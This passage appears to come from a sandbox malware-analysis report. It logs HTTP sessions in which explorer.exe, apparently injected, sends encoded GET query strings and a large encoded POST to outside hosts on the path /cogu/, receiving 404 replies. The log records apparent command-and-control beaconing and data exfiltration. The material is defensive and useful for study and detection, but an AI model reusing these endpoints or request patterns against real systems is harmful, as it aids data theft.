kCyy83D0zThbyRHAFFNkfp-ExLQbBmb5iohtFObwriy(AmcZGHDq5gB0qVO89B5lynDlxl8TM2FGKBQXELLN6uaOjdtPOWgGpN0oKirOtG-al8hb31C9glbX29Ykvy6eIxBQlMkWju1yTI-E5rxV7SLAHD8EfREV9mDp1(KYSf8fnmjoftijw67L-h7WTqRKlpQShER2zG7usHNHOT1LsixWUpJh7OsssfZmZrI(ozpObja(lPYJCdIFCUe6qV1Rt5XAHgVRTIVK45p(7AzkDLmPviHoO08MOduk57HsX(mZYQpq59vM9VngX8N5yNkeKOEBXfH6nN5kqchS52YfJta1gsZe0xX~rtxWWabSBSIUWtfTf2c6oMezlyawBPYpHVzNPAzTOpxpObMQMFJgqOEJ3GAlkoR~Mm87XDCuOhKjAMECbkN46fRUoCw8tnAnjx5EpMnX-45Xqt50RYsN_AtxB9Sl_i_elabkSY6JUt3ij~LcIjr9oCMRNi38aM2kGlLvqvdSkSh1Tt3KRyW7ID7x9i0ubpGkVg0c9YIojk81dFlJZXavRcwWjUjcDREc3x74c~ujexM01CCit~nBOvhFnBZEe~uJ94CSibvaF1fKhRM8QQqKKF89vXwNoX9OQghi0JKzhMEtTOFir7L8eL0HS9umJVBj-LUaMkQaXQmSmfMAXI5YFgznu(84AsZAqKh3pOuSNW4fecQvN1E94HLqgXQyg2t8vIUFeRH9FUBw7S3DcBKjOmvF3ZbbK6BvCojRwBGp3sFcICmKsPeC0GYOeDB45hwMIMdSi3R5Ao6TwA5Avsd2hTEDjNb6HPCju2cGTqtt89HVk9XNIYEupP2zxgg8-7ZKLdJVXArTXtxLG8hOtkFdT(h0fDpR9YCNuPdrP1m7J~T52JGKxrLOpeYZCl8COzxRp17q_9nzXrrIyamR7CbB_eqx-CR1iR4Y0tNYDXPRUU4W67lLG1ssvDyAMZnSKaITliRXXHDyVUGv-ejR8h_cBkxUg3B(a1IY4MUDatO3UffOL7s4sjcHjLIMaew9PhiuhCkdTS_zjBtigi218IpTjhj4LYg22ldkejd2cAopmaz(Xnl9Yw_F1x0AxNMMVS1hbdkUdJbEwyqelXQ0XufefLYDsxBfi8dvuXExp2uXKCs88qUyyjG3prwM4xjDFnmwtHUcwifwGDLWEnKWUFXC8ZBzfqEmTTECseeRnNipcyfU5Z-AUeFqw4o0iEtJY(NRdNzpVKi4kCPB3HmY5XdVWXf9sijaeBAfiwP7raBllWXcz5v(kCEhUTq1hGTrsTh4m6QdYICNQB7XTKMvAZmhDzPkI152-toyafE9TeOOqLOsFRDak1th9OnZaX7MGYET3jDQ0pEbFTBuLfDBGLQZDEzgxrve96twwl8AxMc3p0I0MELdR(fR3JWd_3FaRy1w-PB0qYHm5k7Q92nUgpuiRb4WtCr3clcbhDsIaLSTG9vSunLUtmCh6zR(m9cX-bVK6bFCjNyhsPXE6K8vkmhk_eaBi7SIbHtZausSVyLDsPYjwQUtaXqwywrEMnutgJxd-paMOXmrBtkbL793ZEvPPkNTWRd8o~I3DsHQn0ULjjFBDm3qz26a_g54s0T56p9Y27GfLMMf-ytzoyN5nhQfUJ
Oct 13, 2021 15:53:26.851598978 CEST	8431	OUT	Data Raw: 41 36 57 54 53 42 65 4e 76 75 63 6b 63 67 43 58 56 79 47 6a 68 6d 65 63 30 53 66 47 62 6b 36 4f 5f 35 58 64 33 65 67 44 6b 71 35 61 4d 42 2d 34 72 30 4f 4f 71 66 41 30 5f 63 65 43 77 44 34 4e 7a 35 72 43 68 4d 43 50 53 76 67 41 66 72 54 70 72 43 Data Ascii: A6WTSBeNvuckcgCXVyGjhmec0SfGbk6O_5Xd3egDkq5aMB-4r0OOqfA0_ceCwD4Nz5rChMCPSvgAfrTprCz6gsE49HuBitYAsvh7EcsanjTXvgR3QQNjQidoZjP3wGPfpKQ0PnYBdlAO_XvCN7m5qz03ZUAr0FRFtuH0auQPmRcdWu8fUMhzrqOWcRFaZAVIz2YcWOki4Z5ygQhVmfsGkNF4ubnvzvh1udIeEqvjDE3zE6WdClM
Oct 13, 2021 15:53:26.851777077 CEST	8441	OUT	Data Raw: 70 7a 57 30 47 74 53 77 50 78 4d 42 4c 49 37 46 38 45 65 47 78 73 46 57 51 4d 5a 43 41 79 4e 45 7a 61 31 62 49 65 37 6d 77 4c 4e 63 43 31 4d 42 47 70 68 37 78 7a 41 75 62 43 36 44 77 6b 44 64 73 36 70 38 78 6d 55 78 68 4b 4c 73 55 48 56 4f 4b 6b Data Ascii: pzW0GtSwPxMBLI7F8EeGxsFWQMZCAyNEza1bIe7mwLNcC1MBGph7xzAubC6DwkDds6p8xmUxhKLsUHVOKkoEjGMpdn6FBK7R7jxb3CnDn4MsRmSZbrrDHGhUsWSQz9D9TP8k435RWLjvTn6Poy1C-MTbzNPTRWZ9MeygtMv1Ays~KLECzuw2-SpxMA_9yoSfeDY38zvojJfJpHJ9Wre8eXFcR7PxSUOP8WS3NuOBJoIFCb11a8g
Oct 13, 2021 15:53:26.851952076 CEST	8443	OUT	Data Raw: 37 74 7a 65 4d 49 79 52 73 64 66 68 31 34 65 43 48 66 4c 49 50 49 64 6f 69 61 41 79 49 31 33 38 4d 31 56 4c 67 79 5f 38 56 4e 54 6f 7a 54 4e 70 75 33 51 76 43 61 42 58 7a 28 6c 70 37 5a 5a 42 6e 52 5a 4b 78 61 6d 79 79 4b 54 66 57 4b 66 6d 35 71 Data Ascii: 7tzeMIyRsdfh14eCHfLIPIdoiaAyI138M1VLgy_8VNTozTNpu3QvCaBXz(lp7ZZBnRZKxamyyKTfWKfm5qiByca8RHYgoWYGXEWlwID9tIcM7u4GPn3z6i1Oy3MuBVKkcsf45gkkh4X7NufC6xLbskk9735C-636rj-MC4jpsQTiBCxy71UrocdK2ofs0qORaTImAA9wDXqycikRLguHufxzMqajmlPrTyT(AhmLDGQn_d0x7Rw
Oct 13, 2021 15:53:26.852129936 CEST	8446	OUT	Data Raw: 4f 4d 6c 74 45 68 66 36 77 6c 66 73 78 52 6c 34 4f 65 34 4f 71 31 6a 63 4e 4f 4e 36 75 70 32 73 4e 50 71 46 6f 6c 55 4e 5f 4a 58 41 5f 70 49 31 54 4b 70 70 6b 4e 73 4c 39 69 33 58 7a 50 46 64 68 58 63 35 75 28 4b 30 5f 76 7a 5a 79 30 48 63 48 7a Data Ascii: OMltEhf6wlfsxRl4Oe4Oq1jcNON6up2sNPqFolUN_JXA_pI1TKppkNsL9i3XzPFdhXc5u(K0_vzZy0HcHzyJ401RQ66enr0xMF1fsrGpOTGVLRA0zH1CxmlqrEUe4AquHX9qYMACwG1l568yXl9HT6RZy6V~rBU~q6JPdKUIEEad3JhJI2492KHiA95LanNqm3pZ_(FsSXAEW25OKdiiC7sn5u8IfFnTQYjwT(zBvULLwZfWnOS
Oct 13, 2021 15:53:26.852307081 CEST	8451	OUT	Data Raw: 4e 58 46 5a 75 70 39 77 4c 42 57 75 4d 35 6c 59 33 62 58 62 73 76 48 33 38 4f 52 50 42 37 6c 62 41 51 63 43 78 6e 64 54 67 52 73 73 58 74 65 39 4b 54 34 4e 56 52 34 48 78 59 7a 6d 36 4c 68 4b 77 43 75 4e 77 54 71 4e 32 69 53 47 4d 52 4f 4d 73 61 Data Ascii: NXFZup9wLBWuM5lY3bXbsvH38ORPB7lbAQcCxndTgRssXte9KT4NVR4HxYzm6LhKwCuNwTqN2iSGMROMsahgW0Yy2e6o0lg56CyG876y3kamBhbkRQKYTzS2H0xjARqr6aoA9waMbH5XPAz42xtSTvv23V5s2VGnQEq6xxOutbNpiyNWnz-HPx-RAwEgtS7zTcI5ZXPRHenu4gyzOiqWpYreQIKBorK6TusEW09PJz4qKL10oit
Oct 13, 2021 15:53:26.852483988 CEST	8457	OUT	Data Raw: 47 35 69 76 57 63 5a 64 6b 72 39 78 74 48 70 32 75 46 62 67 56 28 6e 46 2d 6f 38 72 4b 7e 57 68 50 33 5a 4f 79 33 69 69 6c 49 41 73 4b 59 55 64 6d 54 73 53 62 67 41 57 38 62 32 67 65 39 67 5a 47 6e 65 4d 4c 56 39 63 70 78 58 74 37 4c 53 51 73 62 Data Ascii: G5ivWcZdkr9xtHp2uFbgV(nF-o8rK~WhP3ZOy3iilIAsKYUdmTsSbgAW8b2ge9gZGneMLV9cpxXt7LSQsbIAOvHd5TLIqBxiyo1MWEp6jQnDBoTfYFoYlnLH9sGiiMmT5dshF7_BkcbxHn-ZDVG~JjzYReD2udMDSTKbjNFlGzt1WSFMs5-6tIEFZ0nKaE46BAfqOPENBaIiQGNhdk0jFUB0tlbMKc_NuXROhXG8lZKy8Us30MC
Oct 13, 2021 15:53:27.006428003 CEST	8460	OUT	Data Raw: 36 47 6b 4d 34 78 4d 35 69 59 6e 31 77 72 65 73 71 45 2d 33 70 37 36 67 44 36 69 64 37 51 36 4b 77 57 4a 4d 64 48 33 57 5a 79 4e 34 44 41 46 30 53 6b 66 6f 49 45 63 73 70 35 55 64 51 46 49 43 55 34 53 55 65 62 31 59 64 45 62 68 4a 67 6c 6a 2d 73 Data Ascii: 6GkM4xM5iYn1wresqE-3p76gD6id7Q6KwWJMdH3WZyN4DAF0SkfoIEcsp5UdQFICU4SUeb1YdEbhJglj-sa0dHOeVzJlQASp8SlHZPjWy2w37UqmHhdo-iPCmdMTMGTEbCXx-Mi3kI_mym8liFIC8mMAOe0gv8DG4Rj~GxB4H5Fbcd84kqQeJzu1xnaVlccMcrJBNHa6Qo4RClCIprJWBfr5LVKxiuwHXp9L8dPj98asTTEhYMf
Oct 13, 2021 15:53:27.006557941 CEST	8465	OUT	Data Raw: 66 76 4a 30 55 30 35 33 58 30 6e 73 33 31 73 45 61 51 42 4c 34 31 68 71 30 28 57 48 79 33 73 6e 49 48 7a 54 67 7a 46 53 36 6b 52 37 6f 55 4f 4f 47 78 62 71 77 32 36 38 34 74 4c 4d 41 36 54 7a 34 69 39 75 54 42 63 51 32 63 36 75 6d 6b 70 38 4b 6a Data Ascii: fvJ0U053X0ns31sEaQBL41hq0(WHy3snIHzTgzFS6kR7oUOOGxbqw2684tLMA6Tz4i9uTBcQ2c6umkp8KjvVEXcnlGfz1qYFECdnzBZOJzZ(-wbuINi1IEgwtEEFsaltQjLAxfpQHmp2sr0E0O7N2LGg7smrQap6rG67E9bgkrORW5ALcUIM5rHSwPPcfKwCOlMU7EU6g5c5AcNoZn9BDcTYyIm5ST2nrYLChsnL6JDvbpYFCsZ
Oct 13, 2021 15:53:27.006742954 CEST	8481	OUT	Data Raw: 31 4f 46 6d 34 77 6e 36 63 42 38 55 32 6d 5f 4d 71 71 58 73 6e 4c 6b 7e 4e 5a 5a 41 47 72 72 6b 4c 52 43 4d 6f 6f 63 70 37 28 43 44 6d 73 5f 38 4b 4b 50 62 58 31 61 59 46 62 73 35 44 78 67 54 76 38 49 6f 4e 5a 74 6e 62 53 79 76 30 36 58 49 30 50 Data Ascii: 1OFm4wn6cB8U2m_MqqXsnLk~NZZAGrrkLRCMoocp7(CDms_8KKPbX1aYFbs5DxgTv8IoNZtnbSyv06XI0P7m839XKPeDsM5NLBha8USYDhqPzAyCQ8CBWOxwKsXEsdIeA0KY8INTudz5Mh6HCUlrN3ZYsQM5WknCQaj4fOaQcfCBXC5WPSwUXnp(g3IgVEZenhckAi58eO3FVWMvToNoONZIGpKd3mNwZbpuRv7F17KVgSGkJis
Oct 13, 2021 15:53:27.007206917 CEST	8482	OUT	Data Raw: 64 31 65 74 39 64 42 6c 56 48 44 53 72 6c 41 4b 79 53 65 76 76 45 47 32 4d 65 4a 56 6d 66 7a 4c 56 33 61 4f 46 65 6b 77 64 52 4a 67 69 74 6b 54 53 39 52 67 79 39 44 59 59 47 6e 32 41 45 53 74 76 35 6d 77 49 66 61 32 42 51 56 39 4b 67 61 6e 45 43 Data Ascii: d1et9dBlVHDSrlAKySevvEG2MeJVmfzLV3aOFekwdRJgitkTS9Rgy9DYYGn2AEStv5mwIfa2BQV9KganECD~XVpD_rqFn4EmDj6uB(Cxz1q9cuORQ6aCqqKQ_~TocFDdPJx1xK3zfRjR_ZK8W4wEmjrYVeLz2fJaPwIyb~24hFGSESCCd0Ik1wdN1tgTmlg49QcQpGzZLUpJRcKI8GgYKhpCxUeyQHvwEuH5BIb21E3bNzxQYVV
Oct 13, 2021 15:53:27.468034983 CEST	8550	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:53:26 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.11.20	49855	192.64.116.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:28.869091034 CEST	8550	OUT	GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1 Host: www.high-clicks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:29.109446049 CEST	8551	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:53:28 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.11.20	49857	216.189.108.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:36.049118042 CEST	8561	OUT	POST /cogu/ HTTP/1.1 Host: www.tpmionline.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.tpmionline.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.tpmionline.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 66 37 4e 43 71 33 70 65 49 4f 6c 69 50 33 6e 34 71 78 5a 6b 64 6f 59 35 48 64 4a 72 38 69 42 4f 53 4e 4b 6b 37 4b 7e 67 59 5f 71 59 6e 6b 44 51 6f 2d 44 63 45 5f 47 6d 73 79 42 70 63 33 6e 43 45 59 73 58 4c 66 50 73 73 4f 41 68 65 53 58 32 4e 54 71 69 31 50 37 4d 44 65 6e 63 7e 69 41 69 31 50 61 57 69 65 42 39 58 51 7e 54 71 68 6c 46 55 4f 74 37 33 59 76 4b 30 4d 62 4e 43 6b 45 79 6a 4a 6c 36 7e 38 75 42 37 34 65 4f 52 6e 59 30 46 4d 58 5f 44 50 69 68 55 78 63 6a 6b 49 6f 57 7e 72 6d 31 47 57 75 62 51 70 42 42 45 7a 64 72 7a 67 4a 5f 37 62 6e 43 58 53 69 4e 4a 36 76 71 39 61 39 59 31 4e 31 63 59 56 7e 65 72 4d 30 74 28 54 36 57 45 6d 6e 4b 49 2d 6b 56 36 64 53 49 78 4f 53 46 54 48 55 4e 42 54 6a 38 6e 6d 77 44 32 72 46 63 34 53 57 44 33 6f 38 57 72 35 72 69 34 74 43 62 31 6c 56 38 72 52 6e 5f 30 47 77 65 6e 41 68 5a 42 71 6d 76 47 36 6d 4c 64 58 6c 71 53 69 77 52 54 4f 75 39 65 76 50 39 4d 74 5a 59 30 45 72 4a 64 53 45 32 44 45 43 59 54 74 64 48 71 41 49 41 37 77 5a 48 34 46 33 47 79 71 44 30 52 62 4a 4d 33 6d 61 56 33 4d 54 76 4c 44 47 4c 41 70 6a 47 6f 63 59 50 4a 2d 67 6a 52 4c 59 5f 70 35 46 51 28 5a 30 4f 59 33 34 38 68 41 56 53 55 37 63 77 30 48 71 70 56 44 5a 31 4c 5f 45 34 6a 76 53 4d 6c 4d 68 64 70 30 6d 6f 6f 4c 43 56 31 39 36 38 78 78 59 39 4d 55 28 46 58 78 7e 56 42 6c 39 4e 64 49 6c 6e 42 58 6e 7a 30 6f 58 68 62 79 4a 6e 44 76 66 77 72 72 37 78 6f 63 47 41 71 39 53 67 37 2d 5a 78 73 41 57 6d 28 56 6a 48 49 55 37 30 75 56 6a 39 48 53 7e 59 32 31 64 48 67 64 45 61 39 56 34 61 58 58 39 44 6c 43 63 58 46 69 38 35 4d 32 38 6a 4f 45 72 4f 44 72 52 39 4b 4d 49 55 47 32 45 4a 31 77 72 39 58 42 46 58 58 4d 7e 37 6e 63 36 53 7e 6f 53 39 45 5a 65 74 47 39 6c 31 33 31 5a 55 71 65 44 43 42 65 39 56 74 54 36 75 75 66 41 78 66 78 52 34 51 73 65 31 42 45 66 6b 56 47 51 62 4d 54 75 78 6c 59 6d 5f 71 59 44 4b 36 51 33 76 7e 35 5a 37 38 4d 39 51 4f 5a 36 7a 4e 2d 47 37 4a 78 71 59 44 6e 75 73 77 4d 42 37 37 58 69 41 57 74 78 71 47 31 74 6b 6e 72 69 45 58 4b 77 39 6c 50 61 34 69 66 6f 68 69 4f 45 67 6f 35 6e 4a 51 52 5a 57 70 43 4f 32 6c 70 70 63 47 4a 75 61 49 41 66 6a 57 78 43 50 75 4b 31 73 5a 4d 4f 47 65 39 53 75 4f 7a 37 4a 50 58 48 4f 74 74 77 6a 43 52 50 74 37 44 46 75 28 47 59 49 4d 34 32 68 68 66 36 2d 64 75 36 6e 7e 4a 78 47 32 79 70 66 61 6a 48 30 34 36 75 49 63 7a 64 57 7a 54 4e 70 4f 78 61 69 48 4e 41 58 67 38 47 68 6a 70 41 6f 28 5a 73 35 28 6c 31 73 4a 72 6a 67 4f 76 50 31 39 63 76 50 59 50 34 32 61 43 59 59 51 32 57 78 62 33 67 48 47 37 46 31 70 77 4b 33 71 50 67 35 64 6e 7a 55 59 7a 76 72 57 73 7e 6e 7a 57 50 69 67 4e 68 56 46 30 79 6b 64 6a 31 4b 67 59 59 2d 56 74 4b 52 61 32 7a 58 76 6b 61 4c 62 53 74 61 34 4d 58 6b 41 65 37 6c 33 46 4a 6d 57 71 34 31 51 77 51 77 78 41 71 64 37 45 68 49 4d 62 64 77 70 77 6d 73 7a 4e 74 53 75 74 48 5f 34 64 54 47 4b 67 43 64 75 57 79 46 5a 74 35 77 6e 68 28 6b 57 56 34 34 61 4f 4f 43 78 74 44 69 6a 50 4a 78 47 6d 55 64 75 53 57 70 34 68 64 42 67 38 57 5a 6b 6b 6a 65 46 31 63 5f 65 74 79 7a 47 6e 68 62 61 4e 4b 67 6f 7a 30 70 5a 43 78 38 56 70 42 41 56 65 47 6a 44 5f 6d 47 75 62 70 44 37 47 75 33 55 5f 6e 44 57 58 71 59 4a 57 50 70 56 75 57 69 48 58 71 6b 69 48 56 52 63 72 6d 33 55 4d 41 63 50 50 6f 77 7e 5f 39 77 69 44 72 53 69 6d 72 43 54 62 7e 4f 61 42 6f 42 73 39 45 53 4b 75 32 77 71 77 50 72 58 34 77 38 50 76 63 76 75 4f 74 39 31 47 6e 54 55 4a 41 35 62 50 39 6f 7e 56 64 31 31 72 37 64 75 7a 28 33 4d 70 36 62 73 75 75 2d 46 58 67 63 6d 78 47 59 52 52 75 74 41 4a 6b 31 50 51 78 2d 72 41 7a 72 35 64 4d 4e 4a 31 74 35 35 68 6b 41 78 5f 6e 53 37 65 50 78 44 57 50 64 56 76 53 4c 50 34 4a 35 79 68 4e 62 7a 4e 46 6d 28 5f 79 36 36 74 41 4f 61 55 28 4e 71 69 61 46 52 72 79 43 6b 4f 73 6e 6a 42 6d 42 49 63 68 32 33 66 4f 50 42 71 65 4a 47 48 6c 46 7e 4f 69 69 47 4d 49 2d 30 42 51 58 62 55 67 56 54 6a 4a 45 51 76 76 56 71 57 6b 64 43 2d 61 78 57 64 38 67 65 4a 64 2d 55 75 74 6a 49 5f 45 46 7a 53 77 32 33 4d 54 64 4a 53 6a 38 44 30 38 2d 64 47 54 72 52 62 44 44 68 79 32 4f 51 4f 79 39 51 74 49 68 67 71 6a 34 6a 65 74 47 33 7a 72 6e 48 70 6d 78 57 75 79 37 6f 2d 5a 62 Data Ascii: E6=f7NCq3peIOliP3n4qxZkdoY5HdJr8iBOSNKk7K~gY_qYnkDQo-DcE_GmsyBpc3nCEYsXLfPssOAheSX2NTqi1P7MDenc~iAi1PaWieB9XQ~TqhlFUOt73YvK0MbNCkEyjJl6~8uB74eORnY0FMX_DPihUxcjkIoW~rm1GWubQpBBEzdrzgJ_7bnCXSiNJ6vq9a9Y1N1cYV~erM0t(T6WEmnKI-kV6dSIxOSFTHUNBTj8nmwD2rFc4SWD3o8Wr5ri4tCb1lV8rRn_0GwenAhZBqmvG6mLdXlqSiwRTOu9evP9MtZY0ErJdSE2DECYTtdHqAIA7wZH4F3GyqD0RbJM3maV3MTvLDGLApjGocYPJ-gjRLY_p5FQ(Z0OY348hAVSU7cw0HqpVDZ1L_E4jvSMlMhdp0mooLCV1968xxY9MU(FXx~VBl9NdIlnBXnz0oXhbyJnDvfwrr7xocGAq9Sg7-ZxsAWm(VjHIU70uVj9HS~Y21dHgdEa9V4aXX9DlCcXFi85M28jOErODrR9KMIUG2EJ1wr9XBFXXM~7nc6S~oS9EZetG9l131ZUqeDCBe9VtT6uufAxfxR4Qse1BEfkVGQbMTuxlYm_qYDK6Q3v~5Z78M9QOZ6zN-G7JxqYDnuswMB77XiAWtxqG1tknriEXKw9lPa4ifohiOEgo5nJQRZWpCO2lppcGJuaIAfjWxCPuK1sZMOGe9SuOz7JPXHOttwjCRPt7DFu(GYIM42hhf6-du6n~JxG2ypfajH046uIczdWzTNpOxaiHNAXg8GhjpAo(Zs5(l1sJrjgOvP19cvPYP42aCYYQ2Wxb3gHG7F1pwK3qPg5dnzUYzvrWs~nzWPigNhVF0ykdj1KgYY-VtKRa2zXvkaLbSta4MXkAe7l3FJmWq41QwQwxAqd7EhIMbdwpwmszNtSutH_4dTGKgCduWyFZt5wnh(kWV44aOOCxtDijPJxGmUduSWp4hdBg8WZkkjeF1c_etyzGnhbaNKgoz0pZCx8VpBAVeGjD_mGubpD7Gu3U_nDWXqYJWPpVuWiHXqkiHVRcrm3UMAcPPow~_9wiDrSimrCTb~OaBoBs9ESKu2wqwPrX4w8PvcvuOt91GnTUJA5bP9o~Vd11r7duz(3Mp6bsuu-FXgcmxGYRRutAJk1PQx-rAzr5dMNJ1t55hkAx_nS7ePxDWPdVvSLP4J5yhNbzNFm(_y66tAOaU(NqiaFRryCkOsnjBmBIch23fOPBqeJGHlF~OiiGMI-0BQXbUgVTjJEQvvVqWkdC-axWd8geJd-UutjI_EFzSw23MTdJSj8D08-dGTrRbDDhy2OQOy9QtIhgqj4jetG3zrnHpmxWuy7o-ZbppjZyXXy5cCaT12gcM8ZXzZNvK5UtfHQYQnXFUN8D7OSgZ0aA_4HEHpLMWvQiuPQ9y7nuI4BRwGx6VmS36Fe3MBVbI(CN7XZEEpCVFUlWBmBLzqhvyjSa8N4d4eiuTyaYJrvZ0ZiuL6vgb6V93JsjQBtGOtbR-hwDgNAqusQtY(MdXDm~TH1wtSti-sCcriaQRUBHxjTU6ljfb1QxFLmGvJLIe(wxcNUdgq2GXmxLVF5llKtxDaVhV3iTGUS45TVqSVXC-TkI_zayIpr8FS6k-XAyUA9ZBwsVUCyreyVvepvYpB5SFbRUsZUfuVkJnIybuyTRGtTv6q3iZGRKQyslFgI6e7mWCRU73LFMudUI3xFQerkg22srBiszq97oya14fvay7aY9-3coGbRo6If69p8gApwA0YJYxZiwuKcnRDl9Jh3023WXliDdCGSOHffPAinUjE0GAzAbvh235RHRtjqpaVtjc2bi_8vccmb8WLrYG3tK-6wyjK2Bkaw9EVnnkNHLHUtZ-PTzszoiK7YEWEsfoxWlw4oTKmwRMONmNcBXLvw7Lbe4WNHpsGQ7rLHnFRKENz2OBMcOPs3rg0cXmluMAE5lrFXa_0JxFGOWKOf3RBhOPS7DofENBJttfG1jJl9nAwKJaRnf5eBriEMPZyiOjB5ccbj60Sd1Do0p3EZMmOU5EvwYR~_lPPlyC4X0_Wr83CblwYO7GQblSE04qxLziDgxll3wE24jnUtpv5STtWjb9aMI4z0i-Y2ZFXwyAoV8oB-9872kXGJYKCng2VzkQCzOi0ioaU7D_a7cQpgI5J5nV4A4aWCGQfYy23Pn_TVGtFXLR6siu5hxU74OlsrR9chcUbnHVEZcSGn5nVBdeZ2bj(mAAJD(jUOVUxZPox06-3WOYdcu48taW~7PFifSCrH1wKR02xxwsfDHfNKPTEpjUuhy3DbcoLW8DBuST8EY_2p4MpIwgWgKsqMlwqzCh6SEDJZ4zI82Lt1XYvUOhjCdTpdLE(PZ7zeyBC3MQhNpFEb(MZi(-SRWV7E9TKwnx(KwR4D6qUmLbtjR4k-JpPGRCSoDDiLuWWvFxOjNqJOo9oPZapx0p94TcQaJwaaFAgvSHyowPxGhbrJ6JLhHHyf0wgjKm5q2CHUq-wein9N0ZGp29UVAypUiZXPUUhTrWaxdjSRGTdq59bDOdw3dNJrS0lIp75LCL0ZNoqL2oOAcIMh1g39PPpGvgwUiSAVvCnLcr9JEJ3zxV2nJCzKKcY3YIYUjrM8FAjKpJKTxlVvNd0gJMLRHN7TAJ9HFBco(NbMd2EubExxL6PDGcKsd5b7F59yhfNTUMAIexz5m2iU3062xh7pzMwb6twFDbSs6FmaRSQrEDl2O1lzY5l4Tv2Uqju6N8sUF72_MWmStF2sNsusma8uZdc3uwbTY-FJ4sr2MbMmGm6FoaZG(8cJhIHaiVPsPWybNK4Yjm84cjPSlRygDwmGF_EudirbTWoQGZrUqXEmfU0t6iSRN5C-EDU5tTs55Z1BsJv7ueIOfp17WTp8hyn2Tnj5FuujMqC-yf7rxPBcgbK07jNSSuvgv5zc9HTZpvjLXMDXtZHoCKCvDnp4VGUwGRZQuqE7dDBdtTw1OhA8KXVFyvZxtFi2zqDOcUlaeD8fxFht1VP0gOX-984hmGJSpULhVunGS82mYTWr6GByu8Mc0H3ucaNDQ567titjSpp_7n3LWnAA6bojoNN8crjSyKOixPK57wlHMf~BLpWAFA(n83mWjZtHtwNpPf5s2jW5UxXiDGHEaD3Ezjxscrn35UyXEwvLxUG3SddlNC7kUJWXg6ruzsckOXSo7cEX(3CT9oRySwmB1TeKRvPp9Ut2Zah-GWasfGSxdGBuY6J3di(NkyHpnPi-q0(8rRoFNlWG5qsGnTeZZJDSuub9dUH6ugz3HcKtKS2vCQuBRoQZNLXFW5BVWiU-b9w7W42MsY1oldw8NfYzQrsEDTdIOrPkt8875uANxQZsneqthOt_0iM918gi5s8udi3I9fC58SGX8uHUWfT-LikAcMmUIJ0LFn(xxfDptfqLG7aP(hDYrU0Dq8Jdg7bvKRLdxZcDsGjqrkIBpI6EPrTJb-bm